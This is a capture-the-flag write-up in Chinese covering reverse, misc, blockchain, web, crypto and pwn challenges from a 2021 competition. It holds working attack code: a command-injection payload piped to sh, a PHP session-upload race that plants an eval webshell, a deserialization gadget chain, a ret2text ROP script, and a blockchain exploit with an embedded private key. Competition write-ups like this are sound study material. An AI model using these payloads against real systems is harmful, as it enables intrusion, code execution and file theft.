第五空间CTF 初赛wp

阅读量430264

|

发布时间 : 2021-09-29 15:30:39

 

Re

StrangeLanguage

动调猜内存,发现是亦或。

a=[0x53 ,0xF, 0x5A ,0x54, 0x50, 0x55, 0x3, 0x2, 0x0, 0x7, 0x56, 0x7, 0x7, 0x5B, 0x9, 0x0, 0x50, 0x5, 0x2, 0x3, 0x5D, 0x5C, 0x50, 0x51, 0x52, 0x54, 0x5A, 0x5F, 0x2, 0x57, 0x7, 0x34]
for i in range(30,-1,-1):
    a[i]^=a[i+1]
flag=""
for i in range(32):
    flag+=chr(a[i])
print("flag{"+flag+"}")

 

Misc

签到

CheckIn

BabyMi

首先tshark提取一下usbdata的数据
tshark -r a.pcap -T fields -e usb.capdata | tr -s ‘\n’ > data_list

python脚本按行读取去除每行最后的换行。
result+=line[:-1]

利用010editor导入16进制保存即可。
之后diskgenius一下可以直接得到视频,拿到flag。

Alpha10

foremost后
双图盲水印。

记得flag应该是
flag{XqAe3QzK2ehD5fWv8jfBitPqHUw0}

 

Blockchain

CallBox

paradigm-CTF原题
具体可以看我的安全客投稿
https://www.anquanke.com/post/id/250115
这里只贴exp了。

import web3
from web3 import Web3,HTTPProvider
from web3.auto import w3
import hashlib
import json
from Crypto.Util.number import *
web3=Web3(HTTPProvider("http://114.115.157.63:8545/"))
acct=web3.eth.account.from_key('0x107601f7600411eb7203286cf0c83aa4f18b336196c3c98a33dcbb3a49d89a3d')
"""abi=[
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
opcode="6080604052348015600f57600080fd5b50605380601d6000396000f3fe60806040523273ffffffffffffffffffffffffffffffffffffffff16fffea2646970667358221220905d81ab00e22c4df5b3b4a0e06c36d582af1c1bda479c1f5d52b953fc13617064736f6c63430007000033"
contract=web3.eth.contract(abi=abi,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
'from': acct.address,
'nonce': web3.eth.getTransactionCount(acct.address),
'gas': 5000000,
'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
print(tx_id.hex())"""
#print(web3.eth.getTransactionReceipt('0xb04cf1ce18efe0007088ac00792d2c0fd2e159c156ab68eca5890edc2fd23d73'))
# address2 : 0xcaF2f0A364B8D23787F63ed98590F65970b4C50b
abi2=[
    {
        "inputs": [],
        "stateMutability": "nonpayable",
        "type": "constructor"
    },
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
"""opcode="6080604052348015600f57600080fd5b5060838061001e6000396000f3fe6080604052600073caf2f0a364b8d23787f63ed98590f65970b4c50b6000806000806000855af19150508060325750604b565b3273ffffffffffffffffffffffffffffffffffffffff16ff5b00fea2646970667358221220cb8975fb237c4082d510ddec3bb377bd61c129f2794dfd25052e44f3c930257064736f6c63430007000033"
contract=web3.eth.contract(abi=abi2,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
'from': acct.address,
'nonce': web3.eth.getTransactionCount(acct.address),
'gas': 5000000,
'gasPrice': web3.toWei('21', 'gwei')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
import time
time.sleep(2)
print(web3.eth.getTransactionReceipt(tx_id))
"""
#print(web3.eth.getTransactionReceipt('0xbb5d4dd2462e3a808fb3d52aabd8defe0472041971e6eec4b753417d0c4ce5dc'))
# address 1 = 0xeeFDEed9E7A39965a397De6bbe31dfb314525b06
def get_txn(src, dst, datad,nonce, value=0, ):
    return {
        "from": src,
        "to": dst,
        "gasPrice":  web3.toWei(1,'gwei'),
        "gas": 3000000,
        "value":  web3.toWei(value,'wei'),
        "nonce":  nonce,#web3.eth.getTransactionCount(src),
        "data": datad,
         'chainId':8888
    }
"""to_addr='0x9d629baE007F1B454A46fc03FA5FDedB335e5B18'
data=long_to_bytes(0xc24fe950000000000000000000000000eeFDEed9E7A39965a397De6bbe31dfb314525b06)
nonce=web3.eth.getTransactionCount(acct.address)
signed_txn = web3.eth.account.signTransaction(get_txn(acct.address, to_addr, data, nonce), acct.privateKey)
txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
print("hack"+txn_hash)"""
print(web3.eth.getTransactionReceipt('0xc3de56cb62b665191cbc640b6a7a68ffa1d7c22e6aa4f577d0e1bc1d419c3827'))
#print(web3.eth.getTransactionReceipt('0x9ed9c7f8899040de1f54fe911b27474c56b9f4f9e17374fe552e40bbe96c9f70'))

 

Web

WebFtp

扫到了/.git/下的一些东西
审计源码
/Readme/mytz.php
下可以act来控制一些动作
phpinfo()
即可拿到flag

PNG图片转换器

Ruby的open可以执行命令

import requests

print(hex(ord('.')),hex(ord("/")))

res = requests.post(f"{url}/convert",data="file=echo bHMgLw== | base64 -d | sh;.png".encode("utf-8"),headers={"Content-Type":"application/x-www-form-urlencoded"},allow_redirects=False)

print(res.content)

EasyCleanup

PHP SESSION LFI 一把梭了

import requests
import threading

class BasePHPSessionHelper:
    def __init__(self,host) -> None:
        self.host = host
        pass
    @staticmethod
    def createSession(upload_url,sess_name:str="ekitest"):
        while True:
            files = {
                "submit" : ("eki.png","GIF89awhatever","image/png")
            }
            data = {"PHP_SESSION_UPLOAD_PROGRESS" : "<?php echo 'Eki';file_put_contents('eki.php','<?php eval($_POST[1]);?>');?>" }
            headers = {'Cookie':'PHPSESSID=' + sess_name}
            r = requests.post(upload_url,files = files,headers = headers,data=data)

    def sessionInclude(self,sess_name="ekitest"):
        #sessionPath = "/var/lib/php5/sess_" + sess_name
        sessionPath = f"/var/lib/php/sessions/sess_{sess_name}"
        upload_url = f"{self.host}/lfi.php"
        include_url = f"{self.host}/lfi.php?lfi={sessionPath}"
        headers = {'Cookie':'PHPSESSID=' + sess_name}
        t = threading.Thread(target=self.createSession,args=(upload_url,sess_name))
        t.setDaemon(True)
        t.start()
        while True:
            res = requests.post(include_url,headers=headers)
            if b'Eki' in res.content:
                print("[*] Get shell success.")
                break
            else:
                print("[-] retry.")
        return True

import threading,requests

host= "http://114.115.134.72:32770"

class Exp(BasePHPSessionHelper):
    @staticmethod
    def createSession(upload_url,sess_name:str="ekitest"):
        while True:
            files = {
                "submit" : ("eki.png","GIF89awhatever","image/png")
            }
            data = {"PHP_SESSION_UPLOAD_PROGRESS" : "<?php echo 'Included';eval($_REQUEST['eki']);system('cat /flag');file_put_contents('eki.php','<?php eval($_POST[1]);?>');?>" }
            headers = {'Cookie':'PHPSESSID=' + sess_name}
            r = requests.post(upload_url,files = files,headers = headers,data=data)

    def sessionInclude(self,sess_name="ekitest"):
        #sessionPath = "/var/lib/php5/sess_" + sess_name
        #sessionPath = f"/var/lib/php/sessions/sess_{sess_name}"
        sessionPath = f"/tmp/sess_{sess_name}"
        upload_url = f"{self.host}/index.php"
        include_url = f"{self.host}/index.php?file={sessionPath}"
        headers = {'Cookie':'PHPSESSID=' + sess_name}
        t = threading.Thread(target=self.createSession,args=(upload_url,sess_name))
        t.setDaemon(True)
        t.start()
        while True:
            res = requests.post(include_url,headers=headers)
            if b'Included' in res.content:
                print("[*] Get shell success.")
                print(include_url,res.content)
                break
            else:
                print("[-] retry.")
        return True

exp = Exp(host)

exp.sessionInclude("g")

yet_another_mysql_injection

mysql quine

pklovecloud

随便反序列化好像就行了,

<?php  
$heat = 1;
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;

    function setCinder($cinder){
        $this->cinder = $cinder;
    }
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();//here
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            var_dump($file);
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

$b = new stdClass;

$b->neutron = $heat;
$b->nova = $heat;

$a = new ace;

$a->docker = $b;
$a->filename = 'flag.php';
$exp = new acp;


$exp->setCinder($a);

var_dump(urlencode(serialize($exp)));

$logData = unserialize(serialize($exp));
echo $logData; 

?>

 

Crypto

ecc

第一个discrete_log直接出
第二个P的阶有一个大因子,但是太大了魔改一下ph的思路就可以
第三个是P的阶是p用smartattack


from Crypto.Util.number import *


p = 146808027458411567
A = 46056180
B = 2316783294673
E = EllipticCurve(GF(p), [A, B])
P = E(119851377153561800, 50725039619018388, 1)
Q = E(22306318711744209, 111808951703508717, 1)

print(long_to_bytes(discrete_log(Q, P, operation='+')))
p = 1256438680873352167711863680253958927079458741172412327087203
A = 377999945830334462584412960368612
B = 604811648267717218711247799143415167229480
E = EllipticCurve(GF(p),[A,B])

P = E(550637390822762334900354060650869238926454800955557622817950, 700751312208881169841494663466728684704743091638451132521079, 1)
Q = E(1152079922659509908913443110457333432642379532625238229329830, 819973744403969324837069647827669815566569448190043645544592, 1)


print(factor(P.order()) )

factor_list = P.order().factor()
factor_list = [i[0] ^ i[1] for i in factor_list]
factor_list = factor_list[:-1]

M_i = [P.order() // i for i in factor_list]
a_i = [discrete_log(M_i[i] * Q, M_i[i] * P, factor_list[i], operation='+') for i in range(len(factor_list))]

a = crt(a_i, factor_list)
m = 1
for i in factor_list:
    m *= i

# key = a + kk * m
# K = a * G + kk * m * G
# (K - a * G) = kk * (m * G)
# a new ecdlp and bound is kk
# kk is about 21 bit
# so just use bsgs

bound = (2 ^ 56) // m
kk = bsgs(m * P, Q - a * P, (bound // 2, bound), operation='+')
key = a + kk * m

print(bytes.fromhex(hex(key)[2:]))
def HenselLift(P,p,prec):
    E = P.curve()
    Eq = E.change_ring(QQ)
    Ep = Eq.change_ring(Qp(p,prec))
    x_P,y_P = P.xy()
    x_lift = ZZ(x_P)
    y_lift = ZZ(y_P)
    x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6')
    f(a1,a2,a3,a4,a6,x,y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6
    g(y) = f(ZZ(Eq.a1()),ZZ(Eq.a2()),ZZ(Eq.a3()),ZZ(Eq.a4()),ZZ(Eq.a6()),ZZ(x_P),y)
    gDiff = g.diff()
    for i in range(1,prec):
        uInv = ZZ(gDiff(y=y_lift))
        u = uInv.inverse_mod(p^i)
        y_lift = y_lift - u*g(y_lift)
        y_lift = ZZ(Mod(y_lift,p^(i+1)))
    y_lift = y_lift+O(p^prec)
    return Ep([x_lift,y_lift])


def SmartAttack(P,Q,p,prec):
    E = P.curve()
    Eqq = E.change_ring(QQ)
    Eqp = Eqq.change_ring(Qp(p,prec))

    P_Qp = HenselLift(P,p,prec)
    Q_Qp = HenselLift(Q,p,prec)

    p_times_P = p*P_Qp
    p_times_Q=p*Q_Qp

    x_P,y_P = p_times_P.xy()
    x_Q,y_Q = p_times_Q.xy()

    phi_P = -(x_P/y_P)
    phi_Q = -(x_Q/y_Q)
    k = phi_Q/phi_P
    k = Mod(k,p)
    return k

secrets

像个背包?构造下面的格就出了

p = 7920896218820943056702891053785968782942077704655549145065876361907786355057528237061821280280635146678227702121299090049267547565989625947956850127609879
a = [5159988341992193282580685525745512910538614629527934692498086718630359717994948104271635300443062627349528208661883545208904466234606731357843882012950859,
     6335284643679900918720817621948758994408045076082703123014899812263624185305268879304513104269749790342063146501376008458665966651095670658606928517201721,
     6076126683981038494289949541335915228950649182831013867715530414744306299113418155691977393469353865827225836608438360416489035800225275307683760086087019]
c = 2262305826865903827781721021939132022253239409560318732728105425007767005455109451147816015758855318893496902119172860305961200859254558917933621119030425

just = 2 ^ 167

L = Matrix(ZZ, [[         2,      0,      0,      0,      p * just],
                [         0,  2^160,      0,      0,   a[0] * just],
                [         0,      0,  2^224,      0,   a[1] * just],
                [         0,      0,      0,  2^256,   a[2] * just],
                [     2^320,  2^320,  2^320,  2^320,      c * just]
               ])

res = list(L.LLL()[0])[1:4]
res = [(2^320 - res[i]) // L[i + 1][i + 1] for i in range(3)]

from gmpy2 import iroot
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.number import *

secrets = [0 for i in range(3)]

secrets[1] = iroot(res[0] // res[1], int(2))[0]
secrets[0] = iroot(res[2], int(2))[0]
secrets[2] = iroot(res[1] // secrets[0], int(2))[0]
secrets = [int(_) for _ in secrets]

print(secrets)
key = hashlib.sha256(str(secrets).encode()).digest()

cipher = AES.new(key, AES.MODE_ECB)
enc_flag = cipher.decrypt(long_to_bytes(0x99ff236d4f1e020e6c83cc154e20f71eb510913056d47344b44a87f98664efd3))

print(enc_flag)

doublesage

题目有问题
随便 传 5个数字就可以过第一个
再传15个就能过第二个
然后就有flag了

下面的exp也不对 看着题目说要 1 * 23 的向量 所以瞎传了个噪声回去
(反正全0也能出)
有问题这题

from pwn import *
import json


context.log_level = 'debug'
ip, port = '122.112.210.186', 51436


def deal(s):
    return json.loads(s.replace('   ', ' ').replace('  ', ' ').replace('[ ', '[').replace(' ', ',').replace('\n', ''))

io = remote(ip, port)

io.recvuntil('23 :\n')

A = []
for i in range(5):
    A.append(deal(io.recvline().decode()) + [0])

io.recvuntil('23 :\n')
b = deal(io.recvline().decode()) + [290]

A = Matrix(ZZ, A)
b = Matrix(ZZ, b)


mid = block_matrix([29 * identity_matrix(23), Matrix(ZZ, [0] * 23).T], ncols=2)
L = block_matrix([A, mid,  b], nrows=3, subdivide=False)

B = L.LLL()

print(B)

E = Matrix(B[-1]).T[:-1].T

io.recvuntil('29 :\n')

io.sendline(E.str())

print(io.recvline())
# io.interactive() 


io.recvline()
io.recvline()

io.recvuntil('143 :\n')

A = []
for i in range(15):
    # print('###########')
    aaaa = io.recvuntil('\n')
    # print(aaaa)
    A.append(deal(aaaa.decode()) + [0])


io.recvuntil('143 :\n')
b = deal(io.recvuntil(']').decode()) + [227]

A = Matrix(ZZ, A)
b = Matrix(ZZ, b)


mid = block_matrix([227 * identity_matrix(143), Matrix(ZZ, [0] * 143).T], ncols=2)
L = block_matrix([A, mid,  b], nrows=3, subdivide=False)

print('start LLL')
B = L.LLL()

print('done.   #########')

print(B)

E = Matrix(B[-1]).T[:-1].T

io.recvuntil('227 :\n')

io.sendline(E.str())

print(io.recvline())

 

Pwn

Pwn1

ret2text

#coding:utf-8

from pwn import *
import subprocess, sys, os

sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)

elf_path = './pwn'
ip = '139.9.123.168'
port = 32548
remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'

context(os='linux', arch='amd64')
context.log_level = 'debug'

def run(local = 1):
    global elf
    global p
    if local == 1:
        elf = ELF(elf_path, checksec = False)
        p = elf.process()
    else:
        p = remote(ip, port)

run(0)
rdi = 0x000000000040120b
payload = 'a'*144+p64(0)+p64(rdi)+p64(0x403408)+p64(0x401030)
p.send(payload)
p.interactive()

本文由Retr_0原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/253524

安全客 - 有思想的安全新媒体

分享到:微信
+17赞
收藏
Retr_0
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66